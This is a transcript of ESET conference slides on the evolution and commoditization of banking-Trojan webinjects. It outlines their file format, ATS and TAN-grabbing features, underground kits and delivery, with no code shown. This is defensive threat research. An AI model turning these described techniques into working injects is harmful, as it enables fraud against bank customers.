the evolution of webinjects
DESCRIPTION
Webinject files are now ubiquitous in the banking Trojan world to aid financial fraud. What started as private and malware family dependent code has now blossomed into a full ecosystem where independent coders are selling their services to botnet herders. This specialization phenomenon can be observed in underground forums, where we see a growing number of offers for fully functional webinject packages providing all the functionalities required to bypass the latest security measures put forth by financial institutions. Our research covers the current webinject scene and its commoditization. We will take a look back and show how it has evolved over time, going from simple phishing-like functionalities to automatic transfer system (ATS) and two-factor authentication bypass, along with mobile components and full-fledged web control panels to manage money exfiltration through fraudulent money transfers. Nowadays, a malware able to inject arbitrary HTML content in a browser is all that is needed for a resourceful bot master, as he can now outsource practically every other step required to perform successful fraudulent financial transfer. This is confirmed by our recent observation of several malware families using the same webinject kits. Our research will try to answer this question: will we see a consolidation phase leading to the emergence of a few select omnipresent webinject kits, similar to what we have seen in the Web exploit kit scene?TRANSCRIPT
![Page 1: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/1.jpg)
![Page 2: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/2.jpg)
The evolution of webinjects
Jean-Ian Boutin
ESET
![Page 3: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/3.jpg)
• Webinject Evolution
• Webinject Commoditization
• Emergence of Popular Kits
• Webinject Delivery
Outline
![Page 4: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/4.jpg)
Webinject Evolution
![Page 5: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/5.jpg)
• Keyloggers
• Form grabbing
– Inspect GET/POST requests
• Injects are specifically made for one banking Trojan platform
• Only a couple of institutions are available
• Institutions are geo-located
The Beginnings
![Page 6: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/6.jpg)
Keyword indicating which URL is targeted
Popular webinject format
![Page 7: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/7.jpg)
Popular webinject format
Target URL
![Page 8: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/8.jpg)
Popular webinject format
Flags (Get, Post)
![Page 9: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/9.jpg)
Popular webinject format
Keywords specifying where the code should be injected in the webpage
![Page 10: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/10.jpg)
Popular webinject format
Code to inject
![Page 11: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/11.jpg)
• Login grabber
• Injection of additional fields
• Balance grabber/changer
• TAN Grabber
• Full Automatic Transfer Systems (ATS or AZ - avtozaliv)
Increase in Functionalities
![Page 12: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/12.jpg)
Phish-like inject
![Page 13: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/13.jpg)
• Allow transfers to be done automatically
• Inject code able to browse to correct page, fill transfer information, etc
• Not as attractive nowadays due to complexity
Automatic Transfer Systems
![Page 14: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/14.jpg)
• Several form factor exists
Transaction Authorization Number (TAN)
![Page 15: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/15.jpg)
• Inject content tricking the user into entering a TAN
Social Engineering (1/2)
![Page 16: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/16.jpg)
Social Engineering (2/2)• Inject content
tricking the user into installing a malicious application
![Page 17: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/17.jpg)
Popular Webservices Targeted
• Extra content is injected as soon as user logs into his account
• Usually phishing-like webinjects
![Page 18: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/18.jpg)
Webinject Commoditization
![Page 19: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/19.jpg)
Custom Tools
![Page 20: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/20.jpg)
Cheap Webinjects
![Page 21: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/21.jpg)
![Page 22: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/22.jpg)
ATS
• Some webinject seller can include android components to bypass mTAN
![Page 23: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/23.jpg)
Panels
• Some scripts with advanced capabilities come with an administration panel
![Page 24: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/24.jpg)
• Two types of offering for webinject
– Public
– Private
• Partnership, where the revenue can be shared, are also mentioned by some inject coders
Public/Private webinject and Partnerships
![Page 25: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/25.jpg)
Emergence of Popular Kits
![Page 26: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/26.jpg)
ATSEngine
• ATSEngine panel screenshots
• Seen in Qadars, ZeusVM, Neverquest/Vawtrak, Citadel, GOZ
![Page 27: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/27.jpg)
Injeria
• Used in several banking Trojans: Qadars, Tilon, Torpig
• JS downloaded from external source, using a distinctive URL
![Page 28: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/28.jpg)
• Several different project types
– log-<project-name>
– mob-<project-name>
– req-<project-name>
– app-<project-name>
Injeria
![Page 29: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/29.jpg)
• The code and URL structures
• The admin panel design
• Sometimes underground adverts and features correlation is possible
How to track them?
![Page 30: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/30.jpg)
ATSEngine - ID
![Page 31: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/31.jpg)
ATSEngine - ID
![Page 32: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/32.jpg)
Webinject Delivery
![Page 33: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/33.jpg)
Inline vs. external downloads
![Page 34: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/34.jpg)
Inline vs. external downloads
![Page 35: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/35.jpg)
• Advantages
– Hinder forensic analysis
– Feature based selling
– Maintenance by original seller
– New webinject code does not have to be downloaded right away by the bot
JS – External Download
![Page 36: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/36.jpg)
External Sever Interactions
![Page 37: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/37.jpg)
External Server Interactions
![Page 38: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/38.jpg)
Conclusion
![Page 39: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/39.jpg)
• Webinjects have evolved tremendously in the past few years
• In several banking Trojans, it is the true attack code
• Webinject commoditization is well in place
• As different webinject platforms are available, some are more popular than others
Conclusion
![Page 40: The Evolution of Webinjects](https://reader033.vdocuments.us/reader033/viewer/2022060117/558643dad8b42a3c348b4ffd/html5/thumbnails/40.jpg)
• Special thanks to Anton Cherepanov
• Questions?
@jiboutin
Thank You!!